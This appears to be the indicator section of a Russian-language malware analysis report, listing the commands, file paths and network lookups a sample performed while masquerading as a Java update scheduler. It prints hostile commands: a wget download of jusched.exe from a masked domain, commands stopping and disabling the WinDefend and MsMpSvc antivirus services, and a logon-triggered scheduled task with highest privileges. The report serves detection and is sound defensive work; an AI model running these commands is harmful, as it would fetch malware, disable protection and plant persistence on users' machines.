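Техническая информация
Ниже перечислены индикаторы, зафиксированные при анализе образца: запускаемые команды, пути к файлам и сетевые обращения. Команды загружают jusched.exe с помощью wget.exe, останавливают и отключают службы WinDefend и MsMpSvc и создают задачу планировщика java-update-scheduler, которая запускает C:\jusched.exe при входе пользователя в систему с наивысшими привилегиями (/RL HIGHEST). Имена задачи и файла имитируют планировщик обновлений Java, поэтому при проверке узла стоит обращать внимание на jusched.exe в корне диска C:\ и в %TEMP%, а также на остановку или отключение указанных служб. Домен приведён в замаскированном виде (sh##t.in); повторяющиеся пути, по-видимому, относятся к разным разделам отчёта, заголовки которых здесь не сохранились.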
- %TEMP%\1.tmp\wget.exe http://sh##t.in/jusched.exe -O jusched.exe -q
- <SYSTEM32>\sc.exe stop WinDefend
- <SYSTEM32>\net1.exe stop WinDefend
- <SYSTEM32>\net.exe stop WinDefend
- <SYSTEM32>\schtasks.exe /create /SC ONLOGON /TN java-update-scheduler /TR C:\jusched.exe /RL HIGHEST
- <SYSTEM32>\net1.exe config WinDefend start= disabled
- <SYSTEM32>\sc.exe config WinDefend start= disabled
- <SYSTEM32>\net1.exe stop MsMpSvc
- <SYSTEM32>\net.exe stop MsMpSvc
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\command.bat""
- <SYSTEM32>\sc.exe config MsMpSvc start= disabled
- <SYSTEM32>\net1.exe config MsMpSvc start= disabled
- <SYSTEM32>\sc.exe stop MsMpSvc
- %TEMP%\1.tmp\jusched.exe
- C:\jusched.exe
- %TEMP%\1.tmp\command.bat
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\command.bat
- %TEMP%\1.tmp\wget.exe
- 'sh##t.in':80
- sh##t.in/jusched.exe
- DNS ASK sh##t.in